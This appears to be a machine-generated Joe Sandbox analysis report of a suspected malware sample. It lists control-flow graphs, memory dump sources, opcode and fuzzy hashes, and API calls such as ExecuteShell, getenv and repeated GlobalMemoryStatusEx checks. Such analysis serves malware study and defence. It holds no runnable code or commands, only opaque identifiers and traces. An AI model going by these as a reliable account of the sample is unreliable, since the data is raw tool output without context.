                                                                                                                  • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2992075992-0
                                                                                                                  • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                  • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                                  • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                  • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000001.2153678772.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000008.00000001.2153678772.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000001.2153678772.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1611591150-0
                                                                                                                  • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                  • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                                  • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                  • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000001.2153678772.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000008.00000001.2153678772.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000001.2153678772.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc
                                                                                                                  • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                                  • API String ID: 2803490479-2443507578
                                                                                                                  • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                  • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                                  • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                  • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000001.2153678772.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000008.00000001.2153678772.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000001.2153678772.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                                  • String ID: D`:vD`:v$D`:vD`:v
                                                                                                                  • API String ID: 4108700736-3916433284
                                                                                                                  • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                  • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                                  • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                  • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000001.2153678772.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000008.00000001.2153678772.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000001.2153678772.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_1_400000_lxsyrsiW.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                                  • Instruction ID: 66f553c3c70c46b8825420ed88d2deaa6b5bdf89b3e430e74c23cac08a3ac52f
                                                                                                                  • Opcode Fuzzy Hash: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                                  • Instruction Fuzzy Hash: 65A00457F1D540DFD71317107C5515037745F1554575D4CF3445545053D11D44445535

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:14.4%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:170
                                                                                                                  Total number of Limit Nodes:25
                                                                                                                  execution_graph 23134 9e0848 23136 9e084e 23134->23136 23135 9e091b 23136->23135 23138 9e137f 23136->23138 23140 9e1383 23138->23140 23139 9e1484 23139->23136 23140->23139 23145 9e7c0c 23140->23145 23154 9e7d90 23140->23154 23162 9e7c85 23140->23162 23171 9e7ea8 23140->23171 23147 9e7c0b 23145->23147 23146 9e7bc5 23147->23146 23149 9e7e57 23147->23149 23179 9e8708 23147->23179 23185 9e8750 23147->23185 23148 9e7f12 23148->23140 23149->23148 23191 9ef7bf 23149->23191 23196 9ef613 23149->23196 23155 9e7da6 23154->23155 23157 9e7e57 23155->23157 23158 9e8708 3 API calls 23155->23158 23159 9e8750 3 API calls 23155->23159 23156 9e7f12 23156->23140 23157->23156 23160 9ef7bf 3 API calls 23157->23160 23161 9ef613 3 API calls 23157->23161 23158->23155 23159->23155 23160->23156 23161->23156 23164 9e7c0b 23162->23164 23163 9e7bc5 23164->23162 23164->23163 23166 9e7e57 23164->23166 23169 9e8708 3 API calls 23164->23169 23170 9e8750 3 API calls 23164->23170 23165 9e7f12 23165->23140 23166->23165 23167 9ef7bf 3 API calls 23166->23167 23168 9ef613 3 API calls 23166->23168 23167->23165 23168->23165 23169->23164 23170->23164 23172 9e7eb2 23171->23172 23174 9e7ecc 23172->23174 23177 627fb68 3 API calls 23172->23177 23178 627fb58 3 API calls 23172->23178 23173 9e7f12 23173->23140 23174->23173 23175 9ef7bf 3 API calls 23174->23175 23176 9ef613 3 API calls 23174->23176 23175->23173 23176->23173 23177->23174 23178->23174 23180 9e870d 23179->23180 23181 9e8f2d 23180->23181 23201 9e9fa8 23180->23201 23206 9e9f98 23180->23206 23211 9ea04b 23180->23211 23181->23147 23186 9e8769 23185->23186 23187 9e8f2d 23186->23187 23188 9ea04b 3 API calls 23186->23188 23189 9e9f98 3 API calls 23186->23189 23190 9e9fa8 3 API calls 23186->23190 23187->23147 23188->23186 23189->23186 23190->23186 23192 9ef7ca 23191->23192 23286 627fb68 23192->23286 23292 627fb58 23192->23292 23193 9ef7d1 23193->23148 23197 9ef639 23196->23197 23198 9ef6af 23197->23198 23298 9ef840 23197->23298 23304 9ef850 23197->23304 23203 9e9fc5 23201->23203 23202 9ea061 23203->23202 23216 9ea098 23203->23216 23222 9ea0a8 23203->23222 23208 9e9fc5 23206->23208 23207 9ea061 23208->23207 23209 9ea098 3 API calls 23208->23209 23210 9ea0a8 3 API calls 23208->23210 23209->23208 23210->23208 23212 9ea020 23211->23212 23213 9ea061 23212->23213 23214 9ea098 3 API calls 23212->23214 23215 9ea0a8 3 API calls 23212->23215 23214->23212 23215->23212 23218 9ea0a8 23216->23218 23217 9ea182 23218->23217 23228 9ea2d8 23218->23228 23236 9ea1b7 23218->23236 23244 9ea4d6 23218->23244 23223 9ea0c2 23222->23223 23224 9ea182 23223->23224 23225 9ea2d8 3 API calls 23223->23225 23226 9ea4d6 3 API calls 23223->23226 23227 9ea1b7 3 API calls 23223->23227 23224->23224 23225->23223 23226->23223 23227->23223 23230 9ea1e1 23228->23230 23229 9ea505 23229->23218 23230->23229 23231 9ea2d8 3 API calls 23230->23231 23232 9ea4d6 3 API calls 23230->23232 23233 9ea1b7 3 API calls 23230->23233 23252 9edef3 23230->23252 23257 9edf00 23230->23257 23231->23230 23232->23230 23233->23230 23238 9ea1e1 23236->23238 23237 9ea505 23237->23218 23238->23237 23239 9ea2d8 3 API calls 23238->23239 23240 9ea4d6 3 API calls 23238->23240 23241 9ea1b7 3 API calls 23238->23241 23242 9edef3 3 API calls 23238->23242 23243 9edf00 3 API calls 23238->23243 23239->23238 23240->23238 23241->23238 23242->23238 23243->23238 23246 9ea1e1 23244->23246 23245 9ea505 23245->23218 23246->23245 23247 9ea2d8 3 API calls 23246->23247 23248 9ea4d6 3 API calls 23246->23248 23249 9ea1b7 3 API calls 23246->23249 23250 9edef3 3 API calls 23246->23250 23251 9edf00 3 API calls 23246->23251 23247->23246 23248->23246 23249->23246 23250->23246 23251->23246 23254 9edf00 23252->23254 23253 9edf6b 23253->23230 23254->23253 23262 9eeed0 23254->23262 23260 9edf1a 23257->23260 23258 9edf6b 23258->23230 23259 9ee37e 23259->23230 23260->23258 23261 9eeed0 3 API calls 23260->23261 23261->23259 23266 9eef18 23262->23266 23274 9eef08 23262->23274 23263 9ee37e 23263->23230 23267 9eef4d 23266->23267 23268 9eef25 23266->23268 23282 9ee680 23267->23282 23268->23263 23270 9eef6e 23270->23263 23272 9ef036 GlobalMemoryStatusEx 23273 9ef066 23272->23273 23273->23263 23275 9eef18 23274->23275 23276 9eef25 23275->23276 23277 9ee680 GlobalMemoryStatusEx 23275->23277 23276->23263 23279 9eef6a 23277->23279 23278 9eef6e 23278->23263 23279->23278 23280 9ef036 GlobalMemoryStatusEx 23279->23280 23281 9ef066 23280->23281 23281->23263 23283 9eeff0 GlobalMemoryStatusEx 23282->23283 23285 9eef6a 23283->23285 23285->23270 23285->23272 23288 627fb7d 23286->23288 23287 627fd92 23287->23193 23288->23287 23289 9edef3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23288->23289 23290 9edf00 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23288->23290 23291 9ee1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23288->23291 23289->23288 23290->23288 23291->23288 23294 627fb7d 23292->23294 23293 627fd92 23293->23193 23294->23293 23295 9ee1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23294->23295 23296 9edef3 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23294->23296 23297 9edf00 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23294->23297 23295->23294 23296->23294 23297->23294 23299 9ef850 23298->23299 23300 9ef883 23299->23300 23310 9efb06 23299->23310 23317 9ef890 23299->23317 23324 9efa87 23299->23324 23300->23197 23306 9ef855 23304->23306 23305 9ef883 23305->23197 23306->23305 23307 9efb06 3 API calls 23306->23307 23308 9efa87 3 API calls 23306->23308 23309 9ef890 3 API calls 23306->23309 23307->23306 23308->23306 23309->23306 23312 9ef916 23310->23312 23311 9efb32 23312->23311 23314 9efb6b GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23312->23314 23316 9efb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23312->23316 23331 9eff9c 23312->23331 23335 9efd19 23312->23335 23314->23312 23316->23312 23319 9ef8b7 23317->23319 23318 9efb32 23319->23318 23320 9eff9c 3 API calls 23319->23320 23321 9efb6b GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23319->23321 23322 9efd19 3 API calls 23319->23322 23323 9efb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23319->23323 23320->23319 23321->23319 23322->23319 23323->23319 23326 9ef916 23324->23326 23325 9efb32 23326->23325 23327 9eff9c 3 API calls 23326->23327 23328 9efb6b GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23326->23328 23329 9efd19 3 API calls 23326->23329 23330 9efb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23326->23330 23327->23326 23328->23326 23329->23326 23330->23326 23334 9efd47 23331->23334 23332 9edf00 3 API calls 23332->23334 23333 9efd8a 23333->23312 23334->23332 23334->23333 23338 9efd47 23335->23338 23336 9edf00 3 API calls 23336->23338 23337 9efd8a 23337->23312 23338->23336 23338->23337

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 130 6273178-6273199 131 627319b-627319e 130->131 132 62731c4-62731c7 131->132 133 62731a0-62731bf 131->133 134 62731cd-62731ec 132->134 135 6273968-627396a 132->135 133->132 143 6273205-627320f 134->143 144 62731ee-62731f1 134->144 137 6273971-6273974 135->137 138 627396c 135->138 137->131 139 627397a-6273983 137->139 138->137 147 6273215-6273224 143->147 144->143 145 62731f3-6273203 144->145 145->147 256 6273226 call 6273990 147->256 257 6273226 call 6273998 147->257 149 627322b-6273230 150 6273232-6273238 149->150 151 627323d-627351a 149->151 150->139 172 6273520-62735cf 151->172 173 627395a-6273967 151->173 182 62735d1-62735f6 172->182 183 62735f8 172->183 185 6273601-6273614 182->185 183->185 187 6273941-627394d 185->187 188 627361a-627363c 185->188 187->172 189 6273953 187->189 188->187 191 6273642-627364c 188->191 189->173 191->187 192 6273652-627365d 191->192 192->187 193 6273663-6273739 192->193 205 6273747-6273777 193->205 206 627373b-627373d 193->206 210 6273785-6273791 205->210 211 6273779-627377b 205->211 206->205 212 6273793-6273797 210->212 213 62737f1-62737f5 210->213 211->210 212->213 216 6273799-62737c3 212->216 214 6273932-627393b 213->214 215 62737fb-6273837 213->215 214->187 214->193 226 6273845-6273853 215->226 227 6273839-627383b 215->227 223 62737c5-62737c7 216->223 224 62737d1-62737ee 216->224 223->224 224->213 230 6273855-6273860 226->230 231 627386a-6273875 226->231 227->226 230->231 234 6273862 230->234 235 6273877-627387d 231->235 236 627388d-627389e 231->236 234->231 237 6273881-6273883 235->237 238 627387f 235->238 240 62738b6-62738c2 236->240 241 62738a0-62738a6 236->241 237->236 238->236 245 62738c4-62738ca 240->245 246 62738da-627392b 240->246 242 62738aa-62738ac 241->242 243 62738a8 241->243 242->240 243->240 247 62738ce-62738d0 245->247 248 62738cc 245->248 246->214 247->246 248->246 256->149 257->149
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-3723351465
                                                                                                                  • Opcode ID: 02e6454209ad2223cab2677d5362bebbf43a5503c12590d3e1209059c379d8f4
                                                                                                                  • Instruction ID: bda34fa8940d3b98ade97e8d4b33236e2ee6ae7cb56d6ef4dcd22a68d275a3b4
                                                                                                                  • Opcode Fuzzy Hash: 02e6454209ad2223cab2677d5362bebbf43a5503c12590d3e1209059c379d8f4
                                                                                                                  • Instruction Fuzzy Hash: BC321F31E2065ACBCB55EF79C89499DF7B2BFC9300F20C669D449A7254EF30A985CB81

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 799 6277e78-6277e96 800 6277e98-6277e9b 799->800 801 6277eb2-6277eb5 800->801 802 6277e9d-6277eab 800->802 803 6277eb7-6277ec1 801->803 804 6277ec2-6277ec5 801->804 810 6277f1e-6277f34 802->810 811 6277ead 802->811 805 6277ec7-6277ee3 804->805 806 6277ee8-6277eeb 804->806 805->806 808 6277eed-6277f07 806->808 809 6277f0c-6277f0e 806->809 808->809 813 6277f15-6277f18 809->813 814 6277f10 809->814 817 627814f-6278159 810->817 818 6277f3a-6277f43 810->818 811->801 813->800 813->810 814->813 820 627815a-627818f 818->820 821 6277f49-6277f66 818->821 825 6278191-6278194 820->825 831 627813c-6278149 821->831 832 6277f6c-6277f94 821->832 827 627819a-62781a9 825->827 828 62783c9-62783cc 825->828 840 62781ab-62781c6 827->840 841 62781c8-627820c 827->841 829 62783ef-62783f2 828->829 830 62783ce-62783ea 828->830 833 627849d-627849f 829->833 834 62783f8-6278404 829->834 830->829 831->817 831->818 832->831 856 6277f9a-6277fa3 832->856 836 62784a6-62784a9 833->836 837 62784a1 833->837 843 627840f-6278411 834->843 836->825 842 62784af-62784b8 836->842 837->836 840->841 854 6278212-6278223 841->854 855 627839d-62783b3 841->855 844 6278413-6278419 843->844 845 6278429-627842d 843->845 850 627841d-627841f 844->850 851 627841b 844->851 852 627842f-6278439 845->852 853 627843b 845->853 850->845 851->845 858 6278440-6278442 852->858 853->858 865 6278229-6278246 854->865 866 6278388-6278397 854->866 855->828 856->820 860 6277fa9-6277fc5 856->860 861 6278444-6278447 858->861 862 6278453-627848c 858->862 868 6277fcb-6277ff5 860->868 869 627812a-6278136 860->869 861->842 862->827 882 6278492-627849c 862->882 865->866 878 627824c-6278342 call 6276698 865->878 866->854 866->855 883 6278120-6278125 868->883 884 6277ffb-6278023 868->884 869->831 869->856 932 6278344-627834e 878->932 933 6278350 878->933 883->869 884->883 891 6278029-6278057 884->891 891->883 896 627805d-6278066 891->896 896->883 897 627806c-627809e 896->897 905 62780a0-62780a4 897->905 906 62780a9-62780c5 897->906 905->883 908 62780a6 905->908 906->869 909 62780c7-627811e call 6276698 906->909 908->906 909->869 934 6278355-6278357 932->934 933->934 934->866 935 6278359-627835e 934->935 936 6278360-627836a 935->936 937 627836c 935->937 938 6278371-6278373 936->938 937->938 938->866 939 6278375-6278381 938->939 939->866
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q
                                                                                                                  • API String ID: 0-127220927
                                                                                                                  • Opcode ID: c720d1118ce409164b4f0167c562df3055c800d1bac028c1e8bddb14f8acd365
                                                                                                                  • Instruction ID: f4559887521622abd94848cb3f6b80d1ad41105291bcb8234751f6b85d1b8835
                                                                                                                  • Opcode Fuzzy Hash: c720d1118ce409164b4f0167c562df3055c800d1bac028c1e8bddb14f8acd365
                                                                                                                  • Instruction Fuzzy Hash: 0502A030B102069FDB54DB78D894AAEB7E2FF84304F248929E815DB354DB75EC82CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b993ce4e6969cc609e0d71c9bd5c314aa57a197232fd6f0ff9bd356ebe936a72
                                                                                                                  • Instruction ID: e301c6dc879ccd029e2dd2b803af1e158b8719fff563187c9b335d6a1fc8afbb
                                                                                                                  • Opcode Fuzzy Hash: b993ce4e6969cc609e0d71c9bd5c314aa57a197232fd6f0ff9bd356ebe936a72
                                                                                                                  • Instruction Fuzzy Hash: D5A25434A11205CFDBA4DB68C584B9DB7F2FB49310F5484A9E809AB361DB35EE85CF80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9df3b79eb197d13cf10b8471b5ac95a07cd6c07418888c7bf06d79d98b9dab5d
                                                                                                                  • Instruction ID: adbef3d85391fbebd686278cefb153a84d70af3c7b5ce01c9bdf58a76dfcd979
                                                                                                                  • Opcode Fuzzy Hash: 9df3b79eb197d13cf10b8471b5ac95a07cd6c07418888c7bf06d79d98b9dab5d
                                                                                                                  • Instruction Fuzzy Hash: 2762B030B206068FDB64DBA8D594BADB7F2EF84314F248429E805EB355DB35ED46CB81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f8ecefef48a3b5583f59f21679cf43f944e2c875cf0daac4bfc9646c19706395
                                                                                                                  • Instruction ID: 1c1fd55eba1e3e704052d28c0482360dc7b39e9b10b67b68ba87d7482dc0f99c
                                                                                                                  • Opcode Fuzzy Hash: f8ecefef48a3b5583f59f21679cf43f944e2c875cf0daac4bfc9646c19706395
                                                                                                                  • Instruction Fuzzy Hash: 98326174B201069FDB64DB78D890BADB7B2FB89310F208529E805EB355DB35ED42CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5e2239dc3539406d13b1f5ad7a586903b002f30a6daa6d18c68e31277834e099
                                                                                                                  • Instruction ID: 216604772a81b3e581fed6eb81406b85bc1cbacd3f281df128e20ca7f70ab13c
                                                                                                                  • Opcode Fuzzy Hash: 5e2239dc3539406d13b1f5ad7a586903b002f30a6daa6d18c68e31277834e099
                                                                                                                  • Instruction Fuzzy Hash: 8912C431F202169FDB64DB64D880AAEF7B2EF84314F148429E959AB385DF34DD42CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 55517278de8d0e1173156eb85720b06c0ba3cfe66056828adc18e1f8341e805a
                                                                                                                  • Instruction ID: 9dfe7080dd37a5c1cf4ae7da0c31c95b25fc5f195caa9fe8e18d80f685f9eb6d
                                                                                                                  • Opcode Fuzzy Hash: 55517278de8d0e1173156eb85720b06c0ba3cfe66056828adc18e1f8341e805a
                                                                                                                  • Instruction Fuzzy Hash: DD226F74E2010A9BDF64DF68D490BAEB7B2FB49311F248526E815DB395CB34DC81CB92

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 627add0-627adee 2 627adf0-627adf3 0->2 3 627ae16-627ae19 2->3 4 627adf5-627ae11 2->4 5 627ae1f-627ae22 3->5 6 627afed-627aff6 3->6 4->3 10 627ae24-627ae2d 5->10 11 627ae32-627ae35 5->11 7 627ae37-627ae40 6->7 8 627affc-627b006 6->8 13 627b007-627b011 7->13 14 627ae46-627ae4a 7->14 10->11 11->7 12 627ae4f-627ae52 11->12 15 627ae54-627ae67 12->15 16 627ae6c-627ae6f 12->16 21 627b013-627b019 13->21 22 627b032-627b039 13->22 14->12 15->16 19 627ae83-627ae86 16->19 20 627ae71-627ae7e 16->20 24 627ae90-627ae93 19->24 25 627ae88-627ae8d 19->25 20->19 26 627b01b-627b02e 21->26 27 627b03a-627b03e 21->27 22->27 29 627ae95-627ae99 24->29 30 627aea4-627aea6 24->30 25->24 26->22 31 627b040-627b043 27->31 29->8 32 627ae9f 29->32 33 627aead-627aeb0 30->33 34 627aea8 30->34 36 627b066-627b069 31->36 37 627b045-627b061 31->37 32->30 33->2 35 627aeb6-627aeda 33->35 34->33 54 627aee0-627aeef 35->54 55 627afea 35->55 38 627b076-627b079 36->38 39 627b06b-627b06f 36->39 37->36 44 627b086-627b089 38->44 45 627b07b-627b085 38->45 42 627b071 39->42 43 627b08f-627b0ca 39->43 42->38 52 627b0d0-627b0dc 43->52 53 627b2bd-627b2d0 43->53 44->43 46 627b2f2-627b2f5 44->46 49 627b2f7 call 627b32a 46->49 50 627b304-627b306 46->50 59 627b2fd-627b2ff 49->59 56 627b30d-627b310 50->56 57 627b308 50->57 66 627b0de-627b0f7 52->66 67 627b0fc-627b140 52->67 58 627b2d2 53->58 64 627af07-627af42 call 6276698 54->64 65 627aef1-627aef7 54->65 55->6 56->31 60 627b316-627b320 56->60 57->56 63 627b2d3 58->63 59->50 63->63 83 627af44-627af4a 64->83 84 627af5a-627af71 64->84 68 627aefb-627aefd 65->68 69 627aef9 65->69 66->58 81 627b142-627b154 67->81 82 627b15c-627b19b 67->82 68->64 69->64 81->82 90 627b282-627b297 82->90 91 627b1a1-627b27c call 6276698 82->91 85 627af4e-627af50 83->85 86 627af4c 83->86 95 627af73-627af79 84->95 96 627af89-627af9a 84->96 85->84 86->84 90->53 91->90 98 627af7d-627af7f 95->98 99 627af7b 95->99 103 627afb2-627afe3 96->103 104 627af9c-627afa2 96->104 98->96 99->96 103->55 105 627afa6-627afa8 104->105 106 627afa4 104->106 105->103 106->103
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.2434338464.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_6270000_neworigin.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                  • API String ID: 0-1273862796
                                                                                                                  • Opcode ID: c10780729b9b72c4412b1ec343bd344babb425e415b6228e862a1694887ef306
                                                                                                                  • Instruction ID: 0c151fe94e02244edaee5813769f92ccf4a40d2b7dc6ab6c04bbc78421278475
                                                                                                                  • Opcode Fuzzy Hash: c10780729b9b72c4412b1ec343bd344babb425e415b6228e862a1694887ef306
                                                                                                                  • Instruction Fuzzy Hash: DEE17270E2020A8FDB65DF69D490AAEB7B2FF85314F208529E815DB344DB75DC46CB81

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
